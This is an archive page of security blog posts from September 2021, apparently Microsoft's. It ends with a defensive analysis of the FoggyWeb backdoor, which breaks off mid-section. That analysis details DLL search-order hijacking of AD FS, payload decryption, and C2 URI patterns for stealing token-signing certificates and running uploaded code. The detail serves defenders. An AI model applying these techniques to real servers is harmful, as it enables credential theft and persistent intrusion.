Archive for September, 2021

3 key resources to accelerate your passwordless journey

September 30th, 2021 No comments

Every organization today faces password-related challenges—phishing campaigns, productivity loss, and password management costs to name just a few. The risks now outweigh the benefits when it comes to passwords. Even the strongest passwords are easily phish-able and vulnerable to attacks, such as password spray and credential stuffing. People don’t like them either—a third of people surveyed say they’d rather abandon a website than reset their password. “I don’t have any more passwords left in me,” is becoming an all-too-common feeling. It’s time to look at password alternatives that are both highly secure and convenient. Here’s a few key resources that can help you as you plan for and deploy passwordless for your organization.

1. Preparing your organization for passwordless authentication

Today, the technology exists to make sign-ins simpler and more secure. Two protocols, WebAuthn and CTAP2, form what is known as the FIDO2 standard—which enables organizations to upgrade their authentication methods to strong hardware-backed multifactor authentication options that don’t rely on passwords at all. Instead, you can use a physical key, laptop, or mobile app as your credential. Two questions customers often ask are which method do I choose and how do I get started?

I recently published an update to our Passwordless Protection whitepaper, which breaks down the different authentication methods, adoption strategies, and use cases. This guide gives you a great starting point for thinking through your strategy and a foundational understanding of how passwordless authentication works and the requirements for each of the options.

Workflow from left to right showcasing the authentication process for how administrators, info workers, firstline workers, and consumers arrive at the Usability, Security, and Cost value additions for passwordless authentication.

10 reasons to love passwordless

This year, my colleagues also created a series of blog posts 10 reasons to love passwordless, which expands on many of the concepts in the whitepaper.

  1. FIDO2-based credentials developed and adopted by the industry.
  2. Compliance with the National Institute of Standards and Technology (NIST) Authenticator Assurance Levels 2 and 3 (AAL2 and AAL3).
  3. Biometric authentication stored locally to uniquely and securely identify users.
  4. Faster sign-ins with Windows Hello built into your PC.
  5. Portable security keys in a variety of form factors that work across platforms.
  6. Helpdesk savings from password reset requests.
  7. Convenient sign-ins with Microsoft Authenticator app on your smartphone.
  8. Phishing-resistant credentials that reduce risk of compromise by over 99.9 percent.
  9. Easy setup and recovery of passwordless credentials with Temporary Access Pass.
  10. No passwords needed for users to be productive and secure.

2. Planning your passwordless deployment

Check out the passwordless authentication deployment guide, which goes in-depth into how to plan the project, deploy different methods, and manage policies for passwordless authentication based on what we’ve learned from thousands of implementations with customers. Use the passwordless recommendations tool in the Microsoft admin console to help you choose the right method for each of your audiences.

Password authentication sign in approaches include Windows Hello for Business, the Microsoft Authenticator App, and Security Keys.

You can also get a hands-on tour of passwordless capabilities in Microsoft Azure Active Directory from the video Microsoft Mechanics with Joy Chik, Corporate Vice President, Identity and Network Access, and host Jeremy Chapman.

Screenshot from Microsoft Mechanics video with speakers Jeremy Chapman and Joy Chik.

3. Learning from experts

Data is useful, but sometimes you want to hear from people with experience. Join security experts on Wednesday, October 13, 2021, from 10:00 AM to 11:30 AM Pacific Time for Your Passwordless Future Starts Now, a digital event where you’ll learn more about passwordless authentication and best practices for adopting an organization-wide passwordless strategy.

You’ll learn how to:

  • Reduce your security risk. Alex Simons, Corporate Vice President, Identity Program Management, Alex Weinert, Director of Identity Security, and Pamela Dingle, Director of Identity Standards, will cover the challenges of passwords that customers have faced and the benefits of moving to passwordless technologies. Passwordless methods like biometrics make it much simpler for people to sign in—and much harder for attackers to implement a successful phishing campaign. Developers also have a role in reducing the risk of passwords, which is why Mike Hanley, the Chief Security Officer at GitHub, will share how they’ve adopted passwordless for app development.
  • Deploy to your organization. If organization-wide passwordless authentication sounds too good to be true, you’ll want to hear from Mark Russinovich, Azure Chief Technology Officer, and Bret Arsenault, Microsoft Chief Security Officer. In this joint session, they will talk about lessons learned from adopting a passwordless strategy at Microsoft and testing the limits on how far passwordless can extend into your hybrid environment.
  • Help make it a smooth transition for users. Transitioning to a passwordless organization isn’t just about the right technology, it’s also about getting people to adopt something new. Charles Duhigg, New York Times bestselling author of The Power of Habit and Smarter, Faster, Better will explain why humans have such a hard time getting passwords right—and why we should stop expecting them to. He will explain the psychology behind password habits and look at history for insights on how cybersecurity leaders can help people be more secure.
  • Make the first step on your Zero Trust journey. You’ll also learn from the host of the event, Vasu Jakkal, Corporate Vice President, Security, Compliance, and Identity, on why passwordless is a necessary component of a Zero Trust security strategy, which starts with the premise that you must explicitly verify every access request. There are financial and human costs with cyberattacks, and she advises on the steps to take to fortify your digital security.

Learn more

Register now for the Your Passwordless Future Starts Now digital event on October 13, 2021. The session will also be available on-demand for a limited time.

For additional resources and the latest customer stories, visit the Microsoft passwordless web page.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 3 key resources to accelerate your passwordless journey appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

Defend against zero-day exploits with Microsoft Defender Application Guard

September 29th, 2021 No comments

Zero-day security vulnerabilities—known to hackers, but unknown to software creators, security researchers, and the public—are like gold to attackers. With zero-days, or even zero-hours, developers have no time to patch the code, giving hackers enough access and time to explore and map internal networks, exfiltrate valuable data, and find other attack vectors.

Zero-days has become a great profit engine for hackers due to the imperil it poses to the public, organizations, and government. These vulnerabilities are often sold on the dark web for thousands of dollars, fueling nation-state and ransomware attacks and making the cybercrime business even more appealing and profitable to attackers.

Social engineering unlocks doors to zero-day attacks

With zero-day being the new constant, organizations must defend and protect themselves, paying special attention to the user applications as most of the zero-day vulnerabilities out there fall within this environment.

Attackers leverage social engineering tactics to gain users’ trust, deceive them, and influence their actions—from opening a malicious link attached to an email to visiting a compromised website. The malicious code executes when the application opens the weaponized content, exploiting vulnerabilities and downloading malware on the endpoint.

This combination of sophisticated social engineering attacks is a lethal weapon that leverages “the art of deception” combined with human-operated ransomware, allowing attackers to stay undercover while exploiting a system’s vulnerabilities. It creates the perfect scenario for a zero-day attack, allowing attackers to expertly spread and compromise more devices than ever before.

App isolation helps defend against zero-day exploits

In such a challenging environment, where application and web browser scans and filters on their own may not be able to stop attackers from tricking users and preventing malicious code to execute, isolation technology is the way forward to defend against zero-day exploits.

Based on the Zero Trust principles of explicit verification, least privilege access, and assume breach, isolation treats any application and browsing session as untrustworthy by default, adding multiple roadblocks for attackers attempting to get into users’ environments.

Isolation is fully embedded into Microsoft Windows chip to cloud security posture, enabling applications to apply and run in state-of-the-art virtualization technology, such as Microsoft Defender Application Guard (Application Guard), to significantly reduce the blast radius of compatible compromised applications.

With Application Guard, websites and Office files run in an isolated hypervisor (Hyper-V) based container, ensuring that anything that happens within the container remains isolated from the desktop operating system. This means that malicious code originates from a document or website which is running inside the container, the desktop remains intact, and the blast radius of the infection remains confined within the container.

This is the same virtualization-based security (VBS) technology that also powers other Windows security features like Credential Guard and Hypervisor Code Integrity (HVCI).

Presenting Hardware Isolation of Microsoft Edge and Microsoft Office products. Workflow being displayed at the bottom with Device Hardware being the focal point, flowing through Kernel, into the Windows platform before reaching Microsoft Office, Microsoft Edge, and Apps.

Today, the power of Application Guard local isolation is natively built into Microsoft Edge and Microsoft Office, providing seamless protection against malicious Word, PowerPoint, and Excel files and also malicious websites. We have extended this protection to Google Chrome and Mozilla Firefox via the Application Guard plugin, which allows untrusted websites to be opened in isolation using Microsoft Edge.

Application Guard delivers a great first line of defense for organizations—when users run an app or open email attachments and click on a link or an URL, if any of these have malware, it will be contained in the sandbox environment and won’t be able to access the desktop, its systems, or data. Additionally, every malicious attack contained by Application Guard helps inform and improve global threat intelligence, enhancing overall detection capabilities and protecting not only your organization but also millions of other Microsoft customers across the world.

Application Guard for Zero Trust

Isolation is an important part of any organization’s strategy in deploying Zero Trust and defending your system from being compromised without jeopardizing performance and productivity.

Based on the following principles of Zero Trust, isolation technology in Windows forms the backbone of Application Guard providing stronger protection and greater assurance to your users while empowering them to click anywhere.

  • Verify explicitly: Admins can also configure device health attestation policies in their organization using Microsoft Intune. Together with conditional access, these policies will ensure and attest that Windows boots with secure boot enabled—ensuring that the hypervisor booted correctly, and the App Guard container is secure.
  • Least privilege: The hardware isolated container used by Application Guard implements a secure kernel and user space and does not allow any access to the user’s desktop or other trusted resources in an enterprise.
  • Assume breach: For all purposes, this container is considered non-trustworthy and is used to run untrusted content. There is no user data or any identity present inside the container. It is assumed that the untrusted content may contain malicious code.

Learn more

For more information, check out:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Defend against zero-day exploits with Microsoft Defender Application Guard appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust Tags:

How nation-state attackers like NOBELIUM are changing cybersecurity

September 28th, 2021 No comments

This is the first post in a four-part series on the NOBELIUM nation-state cyberattack. Microsoft started telling the industry about this extremely advanced cyberattack in December 2020. The NOBELIUM blog series—which mirrors Microsoft’s four-part video series “Decoding NOBELIUM”—will pull the curtain back on the world of threat detection and showcase insights from cybersecurity professionals on the front lines, both Microsoft defenders and other industry experts.

In many ways, the NOBELIUM nation-state cyberattack realized the deepest fears of United States cybersecurity experts, according to Microsoft 365 Security Corporate Vice President Rob Lefferts. It was a supply chain attack. It was methodically planned and executed. And it impacted multiple world-class companies with strong security teams. Perhaps, your company was one of them—or perhaps you know someone who works at a company that was affected. As we begin Cybersecurity Awareness Month in October, the far-reaching nature of such attacks is ever-present on our minds, which is one reason why more than 3,500 Microsoft security experts actively defend and protect organizations from cyberattacks every day.

Nation-state attacks are malicious cyberattacks that originate from a particular country and are an attempt to further that country’s interests. Numerous organizations were impacted by the NOBELIUM attacks. Such attacks are fueled by geopolitical competition and a desire to gain an advantage over other nations, such as by stealing intellectual property for economic benefit or supporting traditional espionage.

In December 2020, Microsoft began sharing information with the cybersecurity industry on what would become widely recognized as the most sophisticated nation-state cyberattack in history. NOBELIUM, a group of Russia-based hackers, gained access to multiple enterprises through vulnerable software code, stolen passwords, compromised on-premises servers, and minted SAML tokens.

In this supply chain attack, hackers were able to access the SolarWinds code, slip malicious code into a piece of the software, and use the vendor’s legitimate software updates to spread their malware to customer systems. Successful attacks gave NOBELIUM hackers high-level permissions on the downstream compromised systems.

Why should enterprises worry about nation-state attacks?

Historically, nation-state actors directly targeted infrastructure, think tanks, and governments of other countries. However, as organizations improve their defenses, sophisticated actors look for new ways to gain access to their targets through the vendors, software, and networks they rely upon. Enterprises are also increasingly at risk of attacks as nation-state actors expand their objectives to pursue intellectual property theft. As a result, enterprises are often targeted by nation-state actors attacking the networks of their customers, partners, or vendors through their own network or software. The Microsoft Threat Intelligence Center, which collects billions of data points to gather threat intelligence, has observed that enterprises are increasingly at risk of these attacks.

Consider these statistics, which show the magnitude of security threat from nation-state attacks:

  • 35 percent of all nation-state attacks are targeted at enterprises, according to the CSO article, “Nation states: Cyberconflict, and the Web of Profit.”1
  • 78 percent increase in attacks on supply chain vendors, according to the CPO Magazine article “HP Study: Nation-state Cyber Attacks Double Between 2017 and 2020 as World Edges Toward Open Cyber Warfare.”2
  • 13,000 nation-state attack alerts emailed to customers during the past two years, according to the September 2020 Microsoft Digital Defense Report.

Unlike other types of cybercriminals, who exploit a vulnerability and move on, nation-state attackers are persistent and determined to achieve their objectives. They invest serious time profiling their targets and probing their network for vulnerabilities and are continually adding more tools and skills to their capabilities. Any organization—regardless of size—could be a potential target.

Another reason the NOBELIUM attack matters to the enterprise is that state-sponsored attackers often have unlimited monetary and technical support from their countries, giving them access to unique, modern hacking techniques and tactics.

“Nation-state actors are hard because they effectively have infinite funding and they’re above the law – at least in their country,” said Roberto, Principal Consultant and Lead Investigator of the Microsoft Detection and Response Team. “They have very good technical resources, so it’s not like they’re going to give up. It’s one of the reasons we put in the 80-hour weeks.”

NOBELIUM’s long-term impact

How did the NOBELIUM attack unfold and how has it changed cybersecurity? In the first episode of our four-part video series Decoding NOBELIUM: When Nation-States Attack, security professionals share behind-the-scenes details and weigh in on the lasting impacts of the NOBELIUM attack on cybersecurity. Watch the episode to learn security strategies you can implement in your organization, like which vulnerabilities to patch.

Microsoft is committed to helping organizations stay protected from cyberattacks, whether cybercriminal or nation-state. In particular, nation-state adversaries have significant expertise and resources and will develop new attack patterns with the specific intent of furthering their geopolitical objectives. Consistent with our mission to provide security for all, Microsoft will continue to use our leading threat intelligence and global team of dedicated cybersecurity defenders to help protect our customers and the world. Just two recent examples of Microsoft’s efforts to combat nation-state attacks include a September 2021 discovery and investigation of a NOBELIUM malware referred to as FoggyWeb and our May 2021 profiling of NOBELIUM’s early-stage toolset compromising EnvyScout, BoomBox, NativeZone, and VaporRage.

For immediate support, reach out to the Microsoft Security Response Center. Keep an eye out for future posts in the NOBELIUM nation-state attack series. In these posts, we’ll share the story of how we discovered the attack, how we fought the threat, and how the attack has shaped the future of cybersecurity.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1Nation States, Cyberconflict, and the Web of Profit, CSO, 2021.

2HP Study: Nation-State Cyber Attacks Double Between 2017 and 2020 as World Edges Toward Open Cyber Warfare, Scott Ikeda, CPO Magazine. 22 April 021.

The post How nation-state attackers like NOBELIUM are changing cybersecurity appeared first on Microsoft Security Blog.

Categories: cybersecurity, NOBELIUM Tags:

A simpler, more integrated approach to data governance

September 28th, 2021 No comments

It’s no secret that the volume of data created by organizations and people multiplies daily. And, in the digital—and hybrid work—world we live in, that data is spread across more tools, platforms, devices, and clouds than ever before, creating regulatory challenges and security risks.

Organizations must understand what data they have and where it lives, how it is used, and critically, how it’s all governed. How an organization stores its data and how long it is kept is not just a regulatory compliance issue, but also a security issue.

Today, I’m excited to share the general availability of Microsoft Azure Purview, giving organizations that holistic understanding of their data that is so critically important. Azure Purview addresses the need for full visibility across all the places where your data lives, making it easier to manage, glean insights, and govern.

Whether your data is housed on-premises in services like Microsoft SQL Server and Oracle,  different clouds like Amazon Web Services (AWS) S3, or software as a service (SaaS) applications like Salesforce, with Azure Purview you can easily create a unified map of your data assets and their relationships with automated data discovery and sensitive data classification, get insight into the location and movement of data across your hybrid landscape, and empower data consumers to find valuable data through a data catalog.

For more details about Azure Purview, check out the Azure Purview blog today.

Simplifying data protection and governance management

Managing an organization’s data from a protection and governance perspective can be simplified with Azure Purview and Microsoft Information Protection (MIP). MIP is a built-in, intelligent, unified, and extensible solution to protect sensitive data in documents and emails across your organization. MIP provides a unified set of capabilities to know and protect your data and prevent data loss across Microsoft 365 apps (like Word, PowerPoint, Excel, and Outlook), services (like Microsoft Teams, SharePoint, Exchange, and Microsoft Power BI), on-premises locations (like SharePoint Server and on-premises files shares), devices, and third-party apps and services (like Box and Dropbox).

Azure Purview integrates with MIP so that you can apply the same sensitivity labels defined in the Microsoft 365 Compliance Center to data assets in Azure Purview. This helps you have a comprehensive view of your data across your entire estate so you know where your sensitive data lies and can govern it accordingly.

This integration also lets you write your policies once in MIP and apply them to Azure Purview. It lets you streamline and integrate governance and protection. Azure Purview and MIP share this capability. So, if you are already using MIP to apply sensitivity labels to data related to General Data Protection Regulation (GDPR), that label now applies to data governed in Azure Purview. From emails to databases, MIP and Azure Purview give you a simplified, integrated approach to governance.

The journey to simplifying the complexity of data governance

For organizations to overcome the uncertainty of the safety of their data today—not to mention the complexity of data regulations—organizations must have a birds-eye view of all their data. Taking an integrated and more simplified approach to data governance will not only help you to better understand and analyze your data but also reduce your attack surface. In our environment today, this is a must.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A simpler, more integrated approach to data governance appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor

September 27th, 2021 No comments

Microsoft continues to work with partners and customers to track and expand our knowledge of the threat actor we refer to as NOBELIUM, the actor behind the SUNBURST backdoor, TEARDROP malware, and related components. As we stated before, we suspect that NOBELIUM can draw from significant operational resources often showcased in their campaigns, including custom-built malware and tools. In March 2021, we profiled NOBELIUM’s GoldMax, GoldFinder, and Sibot malware, which it uses for layered persistence. We then followed that up with another post in May, when we analyzed the actor’s early-stage toolset comprising EnvyScout, BoomBox, NativeZone, and VaporRage.

This blog is another in-depth analysis of newly detected NOBELIUM malware: a post-exploitation backdoor that Microsoft Threat Intelligence Center (MSTIC) refers to as FoggyWeb. As mentioned in previous blogs, NOBELIUM employs multiple tactics to pursue credential theft with the objective of gaining admin-level access to Active Directory Federation Services (AD FS) servers. Once NOBELIUM obtains credentials and successfully compromises a server, the actor relies on that access to maintain persistence and deepen its infiltration using sophisticated malware and tools. NOBELIUM uses FoggyWeb to remotely exfiltrate the configuration database of compromised AD FS servers, decrypted token-signing certificate, and token-decryption certificate, as well as to download and execute additional components. Use of FoggyWeb has been observed in the wild as early as April 2021.

Microsoft has notified all customers observed being targeted or compromised by this activity. If you believe your organization has been compromised, we recommend that you

  • Audit your on-premises and cloud infrastructure, including configuration, per-user and per-app settings, forwarding rules, and other changes the actor might have made to maintain their access
  • Remove user and app access, review configurations for each, and re-issue new, strong credentials following documented industry best practices.
  • Use a hardware security module (HSM) as described in securing AD FS servers to prevent the exfiltration of secrets by FoggyWeb.

Microsoft security products have implemented detections and protections against this malware. Indicators of compromise (IOCs), mitigation guidance, detection details, and hunting queries for Azure Sentinel and Microsoft 365 Defender customers are provided at the end of this analysis and in the product portals. Active Directory Federation Services (AD FS) servers run on-premises and customers can also follow detailed guidance on securing AD FS servers against attacks.

FoggyWeb: Backdoor targeting AD FS

FoggyWeb is a passive and highly targeted backdoor capable of remotely exfiltrating sensitive information from a compromised AD FS server. It can also receive additional malicious components from a command-and-control (C2) server and execute them on the compromised server.

After compromising an AD FS server, NOBELIUM was observed dropping the following two files on the system (administrative privileges are required to write these files to the  folders listed below):

  • %WinDir%\ADFS\version.dll
  • %WinDir%\SystemResources\Windows.Data.TimeZones\pris\Windows.Data.TimeZones.zh-PH.pri

FoggyWeb is stored in the encrypted file Windows.Data.TimeZones.zh-PH.pri, while the malicious file version.dll can be described as its loader. The AD FS service executable Microsoft.IdentityServer.ServiceHost.exe loads the said DLL file via the DLL search order hijacking technique that involves the core Common Language Runtime (CLR) DLL files (described in detail in the FoggyWeb loader section). This loader is responsible for loading the encrypted FoggyWeb backdoor file and utilizing a custom Lightweight Encryption Algorithm (LEA) routine to decrypt the backdoor in memory.

After de-obfuscating the backdoor, the loader proceeds to load FoggyWeb in the execution context of the AD FS application. The loader, an unmanaged application, leverages the CLR hosting interfaces and APIs to load the backdoor, a managed DLL, in the same Application Domain within which the legitimate AD FS managed code is executed. This grants the backdoor access to the AD FS codebase and resources, including the AD FS configuration database (as it inherits the AD FS service account permissions required to access the configuration database).

Diagram showing structure of Microsoft.IdentityServer.ServiceHost.exe after loading version.dll

When loaded, the FoggyWeb backdoor (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a passive and persistent backdoor that allows abuse of the Security Assertion Markup Language (SAML) token. The backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target’s AD FS deployment. The custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. This version of FoggyWeb configures listeners for the following hardcoded URI patterns (which might vary per target):

  • HTTP GET URI pattern:
    • /adfs/portal/images/theme/light01/profile.webp
    • /adfs/portal/images/theme/light01/background.webp
    • /adfs/portal/images/theme/light01/logo.webp
  • HTTP POST URI pattern:
    • /adfs/services/trust/2005/samlmixed/upload

Each HTTP GET/POST URI pattern above corresponds to a C2 command:

  • When the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/profile.webp, the backdoor retrieves the token signing certificate of the compromised AD FS server and then obfuscates and returns the certificate to the issuer of the request.
  • Similarly, when the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/background.webp, the backdoor retrieves the token decryption certificate of the compromised AD FS server and then obfuscates and returns the certificate to the issuer of the request.
  • When the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/logo.webp, the backdoor retrieves the AD FS configuration data of the compromised server, obfuscates the data, and returns the obfuscated data to the issuer of the request.
  • When the AD FS server receives an HTTP POST request containing the URI pattern /adfs/services/trust/2005/samlmixed/upload, the backdoor treats the obfuscated and compressed POST data as either .NET assembly or source code. If assembly, the backdoor executes the assembly in the execution context of the AD FS process. If source code, the backdoor dynamically compiles the source code and proceeds to execute the resulting memory-resident assembly in the execution context of the AD FS process.

The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server.

Diagram showing FoggyWeb attack chain

Since FoggyWeb runs in the context of the main AD FS process, it inherits the AD FS service account permissions required to access the AD FS configuration database. This contrasts with tools such as ADFSDump that must be executed under the user context of the AD FS service account. Also, because FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects, and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations. For example, this allows FoggyWeb to gain access to the AD FS configuration data without connecting to the WID named pipe or manually running SQL queries to retrieve configuration information (for example, to obtain the EncryptedPfx blob from the configuration data). FoggyWeb is also AD FS version-agnostic; it does not need to keep track of legacy versus modern configuration table names and schemas, named pipe names, and other version-dependent properties of AD FS.

FoggyWeb loader

The file version.dll is a malicious loader responsible for loading an encrypted backdoor file from the file system, decrypting the backdoor file, and loading it in memory. This malicious DLL, which shares a name with a legitimate Windows DLL located in the %WinDir%\System32\ folder, is meant to be placed in the main AD FS folder %WinDir%\ADFS\, where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located (for reasons described later in this section).

When the AD FS service (adfssrv) is started, the service executable Microsoft.IdentityServer.ServiceHost.exe gets executed. As a .NET-based managed application, Microsoft.IdentityServer.ServiceHost.exe imports an unmanaged Windows DLL named mscoree.dll.

Screenshot showing Microsoft.IdentityServer.ServiceHost.exe importing mscoree.dll.

The file mscoree.dll dynamically loads another unmanaged Windows/CLR DLL named mscoreei.dll. As shown below, mscoreei.dll has a delay load import (Delay Import) named version.dll.

Screenshot showing mscoreei.dll has a delay load import (Delay Import) named version.dll

NOBELIUM, with existing administrative permissions, was observed to drop a malicious loader named version.dll in the %WinDir%\ADFS\ folder where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located. Once the system or the AD FS service is restarted, Microsoft.IdentityServer.ServiceHost.exe loads mscoree.dll, which in turn loads mscoreei.dll. As mentioned above, mscoreei.dll has a delay load import named version.dll. Once loaded, instead of loading the legitimate version.dll from the %WinDir%\System32\ folder mscoreei.dll loads the malicious version.dll planted by the attacker in %WinDir%\ADFS\ folder (referred to as DLL search order hijacking), as shown in the call stack below.

Screenshot of call stack showing folder mscoreei.dll loads the malicious version.dll planted by the attacker in %WinDir%\ADFS\ folder

The malicious loader version.dll behaves as a proxy for all legitimate version.dll export function calls. As shown below, it exports the same 17 function names as the legitimate version of version.dll.

Screenshot of dump of the legitimate version.dll  Screenshot of the malicious version.dll

The export functions of the malicious version.dll are all short stubs that call a single trampoline function labeled TrampolineFunction, as seen in the screenshot below.

Screenshot of the export functions of the malicious version.dll

Below is a pseudocode for the trampoline function.

Screenshot of pseudocode for the trampoline function

This trampoline function is responsible for the following:

  • Calling a function (labeled as LoadDecryptExecuteBackdoor() by the analyst) to load a backdoor file from the file system, and then decrypting and executing the file in memory
  • Transferring execution to the initially called target function from the legitimate version of version.dll.

The trampoline function preserves the value of the arguments/registers intended for the function from the legitimate version of version.dll by saving the value of certain CPU registers. It first pushes them onto the stack before calling the LoadDecryptExecuteBackdoor() function above and then restoring them before transferring execution to the function from the legitimate version of version.dll.

Screenshot of code showing trampoline function preserves the value of the arguments/registers intended for the function from the legitimate version of version.dll by saving the value of certain CPU register

When called, LoadDecryptExecuteBackdoor() attempts to create a Windows event named {2783c149-77a7-5e51-0d83-ac0566daff96} to ensure that only one copy of the loader is actively running on the system. In a new thread, it then checks if the following file is present (hardcoded path string):


Windows.Data.TimeZones.zh-PH.pri is an encrypted backdoor file that is placed in the folder above. MSTIC refers to this backdoor file as FoggyWeb, and our analysis is in the next section.

Microsoft.IdentityServer.ServiceHost.exe in and of itself is an unmanaged Windows executable that is generated when the high-level AD FS managed code is compiled. When executed, the unmanaged code inside Microsoft.IdentityServer.ServiceHost.exe leverages Common Language Runtime (CLR) to run the managed AD FS code within a virtual runtime environment. This virtual runtime environment is comprised of one or more application domains, which provide a unit of isolation for the runtime environment and allow different applications to run inside separate containers within a process. The managed AD FS code is executed within an application domain inside the virtual runtime environment.

The FoggyWeb backdoor (also a managed DLL) is intended to run alongside the legitimate AD FS code (that is, within the same application domain). This means that for the FoggyWeb loader to load the backdoor alongside the AD FS code, it needs to gain access to the same application domain that the AD FS code is executed within. Since the FoggyWeb loader version.dll is an unmanaged application, it cannot directly access the virtual runtime environment that the managed AD FS code is executed within. The loader overcomes this limitation and loads the backdoor alongside the AD FS code by leveraging the CLR hosting interfaces and APIs to access the virtual runtime environment within which the AD FS code is executed.

The loader performs the following high-level actions:

  • Enumerate all CLRs loaded in the AD FS process Microsoft.IdentityServer.ServiceHost.exe
  • For each CLR, enumerate all running application domains and perform the following actions for each domain:
    • Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\Windows\SystemResources\Windows.Data.TimeZones\pris\Windows.Data.TimeZones.zh-PH.pri
    • Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys:

Screenshot of hardcoded master key to generate the round keys

After decrypting each 16-byte cipher block, the loader uses the following XOR key to decode each individual decrypted/plaintext block:

Screenshot of XOR key to decode each individual decrypted/plaintext block

This is equivalent to first LEA decrypting the entire file and then XOR decoding the decrypted data (instead of decrypting and XOR decoding each individual 16-byte block).

    • Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost.

At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Because the backdoor is loaded in the same application domain as the AD FS code, it gains programmatical access to the legitimate classes, methods, properties, fields, objects, and components used by various AD FS modules to carry out their legitimate functionality. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations.

FoggyWeb backdoor

This malicious memory-resident DLL (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a backdoor targeting AD FS. It is loaded by the main AD FS service process Microsoft.IdentityServer.ServiceHost.exe through a malicious loader component.

When loaded, the backdoor starts an HTTP listener that listens for HTTP GET and POST requests containing the following URI patterns:

  • HTTP GET URI pattern: /adfs/portal/images/theme/light01/
  • HTTP POST URI pattern: /adfs/services/trust/2005/samlmixed/upload

As shown below, the URI patterns are hardcoded in the backdoor and mimic the structure of the legitimate URIs used by the target’s AD FS deployment.

Screenshot of backdoor structure that mimic the structure of the legitimate URIs used by the target’s AD FS deployment.

Once the backdoor receives an HTTP request that contains one of the URI patterns above, the listener proceeds to handle the request using either an HTTP GET or HTTP POST callback/handler method (ProcessGetRequest() and ProcessGetRequest(), respectively).

Screenshot of code showing the listener handling the request using either an HTTP GET or HTTP POST callback/handler method

HTTP GET handler

The incoming HTTP GET requests that contain the URI pattern /adfs/portal/images/theme/light01/ are handled by backdoor’s ProcessGetRequest() method.

Screenshot of ProcessGetRequest() method

If an incoming HTTP GET request is issued for a file/resource with the file extension of .webp, the ProcessGetRequest() method proceeds to handle the request. Otherwise, the request is ignored by the backdoor. Also, if the requested file name matches one of the three hardcoded names below, the backdoor treats the request as a C2 command issued by the attacker.

Screenshot of code showing hardcoded names

The following URL patterns are treated as C2 commands:

  • /adfs/portal/images/theme/light01/profile.webp
  • /adfs/portal/images/theme/light01/background.webp
  • /adfs/portal/images/theme/light01/logo.webp

The first two C2 commands, profile.webp and background.webp (UrlGetFileNames[0] and UrlGetFileNames[1] in the screenshot above), are handled by calling the backdoor’s Service.GetCertificate() method.

Screenshot of code for Service.GetCertificate() method

As the name suggests, this method is responsible for retrieving an AD FS certificate (either the token- signing or the token encryption certificate, depending on the value of the certificateType parameter passed to the method) from the AD FS service configuration database.

Analyst note: Refer to the Appendix for an in-depth analysis of the Service.GetCertificate() method and how it obtains and decrypts either the token signing or encryption certificate.

As shown in the screenshot above, when the C2 command profile.webp (UrlGetFileNames[0]) is issued to the backdoor (by issuing an HTTP GET request for the URI /adfs/portal/images/theme/light01/profile.webp), the backdoor retrieves the token-signing certificate of the compromised AD FS server. Similarly, when the C2 command background.webp (UrlGetFileNames[1]) is issued to the backdoor (by issuing an HTTP GET request for the URI /adfs/portal/images/theme/light01/background.webp), the backdoor retrieves the token encryption certificate of the compromised AD FS server.

The third C2 command, logo.webp (UrlGetFileNames[2]), is triggered by sending an HTTP GET request to the following URI: /adfs/portal/images/theme/light01/logo.webp. The C2 command is handled by calling the backdoor’s GetInfo() method.

Screenshot of code for the backdoor’s GetInfo() method

The GetInfo() method is responsible for dumping the AD FS service configuration data of the compromised server.

Screenshot of GetInfo() method dumping the AD FS service configuration data

As shown above, the AD FS service configuration data is obtained via the ServiceSettingsData property, which retrieves the data from the AD FS service configuration database, Windows Internal Database (WID).

Before returning the output of the C2 commands (that is, the token-signing certificate, the token encryption certificate, or the AD FS service configuration data) to the C2 in an HTTP 200 response, the backdoor first obfuscates the output by calling its method named GetWebpImage().

Screenshot of code for GetWebpImage() method

The GetWebpImage() method is in charge of masquerading the output of the C2 commands as a legitimate WebP file (by adding appropriate RIFF/WebP file header magic/fields) and encoding the resulting WebP file.

Screenshot of code for GetWebpImage() method masquerading the output of the C2

GetWebpImage() uses the following helper methods to create and encode the fake WebP file that contains the C2 command output:

